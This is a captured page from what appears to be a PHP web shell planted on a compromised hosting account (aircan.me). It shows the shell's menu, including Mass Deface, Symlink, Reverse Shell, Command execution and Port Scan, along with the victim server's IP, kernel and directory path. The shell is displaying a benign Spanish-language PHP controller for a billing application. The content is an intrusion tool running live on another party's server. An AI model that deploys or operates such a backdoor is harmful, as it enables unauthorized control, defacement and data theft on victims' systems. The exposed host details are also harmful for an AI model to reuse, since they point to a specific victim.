Tul xxx Tul
User / IP
:
216.73.217.33
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
siscaps
/
controllers
/
Viewing: DatosController.php
<?php class DatosController extends BaseController { private function normalizeText($value): ?string { if ($value === null) { return null; } $s = trim((string)$value); return $s === '' ? null : $s; } private function handleLogoUpload(array $file): string { if (empty($file['tmp_name']) || (int)$file['error'] !== UPLOAD_ERR_OK) { throw new RuntimeException('No se recibió una imagen válida.'); } $maxBytes = 2 * 1024 * 1024; if (!empty($file['size']) && (int)$file['size'] > $maxBytes) { throw new RuntimeException('La imagen excede el tamaño máximo permitido (2MB).'); } $extension = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION)); $allowedExt = ['png','jpg','jpeg','webp','gif']; if ($extension === 'jpeg') { $extension = 'jpg'; } if (!in_array($extension, $allowedExt, true)) { throw new RuntimeException('Formato de imagen no permitido.'); } $tmp = (string)$file['tmp_name']; $imgInfo = @getimagesize($tmp); if ($imgInfo === false) { throw new RuntimeException('El archivo no parece ser una imagen.'); } $targetDir = dirname(__DIR__) . '/public/uploads/system'; if (!is_dir($targetDir)) { @mkdir($targetDir, 0775, true); } $filename = 'logo_' . date('Ymd_His') . '_' . bin2hex(random_bytes(4)) . '.' . $extension; $destination = $targetDir . '/' . $filename; if (!move_uploaded_file($tmp, $destination)) { throw new RuntimeException('No se pudo guardar el logo.'); } return 'uploads/system/' . $filename; } public function index(): void { $csrf = $this->generateCsrf(); $data = SystemData::get(); $this->renderView('datos/index', [ 'csrf' => $csrf, 'data' => $data, ]); } public function updateField(): void { if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') { $this->renderJson(['ok' => false, 'error' => 'Método inválido.'], 405); } if (!$this->validateCsrf()) { $this->renderJson(['ok' => false, 'error' => 'CSRF inválido.'], 400); } $field = trim((string)($_POST['field'] ?? '')); $value = $_POST['value'] ?? null; try { switch ($field) { case 'invoice_due_days': $value = $this->normalizeText($value); if ($value === null) { $value = 10; } if (!is_numeric($value)) { throw new RuntimeException('Valor inválido.'); } $value = max(0, (int)$value); break; case 'cut_alert_days': $value = $this->normalizeText($value); if ($value === null) { $value = 0; } if (!is_numeric($value)) { throw new RuntimeException('Valor inválido.'); } $value = max(0, (int)$value); break; case 'late_fee_method': $value = $this->normalizeText($value); if ($value === null) { $value = 'days'; } $value = strtolower((string)$value); $allowed = ['days', 'percentage']; if (!in_array($value, $allowed, true)) { throw new RuntimeException('Método de mora inválido.'); } break; case 'late_fee_percentage': $value = $this->normalizeText($value); if ($value === null) { $value = 0; } if (!is_numeric($value)) { throw new RuntimeException('Valor inválido.'); } $value = max(0, (float)$value); // Porcentaje en rango razonable if ($value > 100) { $value = 100; } break; case 'late_fee_daily_amount': $value = $this->normalizeText($value); if ($value === null) { $value = 0; } if (!is_numeric($value)) { throw new RuntimeException('Valor inválido.'); } $value = max(0, (float)$value); break; case 'aqueduct_type': $value = $this->normalizeText($value); break; case 'email': $value = $this->normalizeText($value); if ($value !== null && !filter_var($value, FILTER_VALIDATE_EMAIL)) { throw new RuntimeException('Correo electrónico inválido.'); } break; case 'constitution_date': $value = $this->normalizeText($value); if ($value !== null) { $dt = DateTime::createFromFormat('Y-m-d', $value); $valid = $dt && $dt->format('Y-m-d') === $value; if (!$valid) { throw new RuntimeException('Fecha inválida.'); } } break; default: $value = $this->normalizeText($value); break; } $ok = SystemData::updateField($field, $value); if (!$ok) { throw new RuntimeException('No se pudo guardar el campo.'); } $this->renderJson([ 'ok' => true, 'field' => $field, 'value' => $value, ]); } catch (Throwable $e) { $this->renderJson(['ok' => false, 'error' => $e->getMessage()], 400); } } public function uploadLogo(): void { if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') { $this->renderJson(['ok' => false, 'error' => 'Método inválido.'], 405); } if (!$this->validateCsrf()) { $this->renderJson(['ok' => false, 'error' => 'CSRF inválido.'], 400); } try { $file = $_FILES['logo'] ?? null; if (!$file || empty($file['tmp_name'])) { throw new RuntimeException('Debes seleccionar una imagen.'); } $path = $this->handleLogoUpload($file); $ok = SystemData::updateField('logo_path', $path); if (!$ok) { throw new RuntimeException('No se pudo guardar el logo.'); } $this->renderJson([ 'ok' => true, 'logo_path' => $path, 'url' => BASE_URL . $path, ]); } catch (Throwable $e) { $this->renderJson(['ok' => false, 'error' => $e->getMessage()], 400); } } }
Coded With 💗 by
0x6ick